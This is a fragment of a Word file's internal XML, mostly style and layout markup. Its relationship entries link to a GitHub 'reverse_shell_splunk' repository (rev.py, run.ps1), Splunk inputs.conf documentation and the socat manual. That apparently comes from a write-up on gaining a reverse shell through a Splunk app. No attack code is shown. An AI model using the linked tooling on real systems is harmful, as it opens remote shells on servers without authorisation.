    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00643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643968"/>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643968"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00643968"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0064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91630">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1932160722">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1075322952">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1559706188">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="583222032">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1307928870">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="86583514">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="48766021">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1818456502">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2015381468">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="133256041">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="133330480">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1774594131">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="14266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25">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1279996111">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="713115322">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="115566303">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="20586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153">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1969773178">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1047996981">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2093509187">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="18820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hyperlink" Target="https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf" TargetMode="External"/><Relationship Id="rId12"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0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/socat" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py"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s://github.com/0xjpuff/reverse_shell_splunk" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX1.xml"/><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2023-08-31T13:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-31T13:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>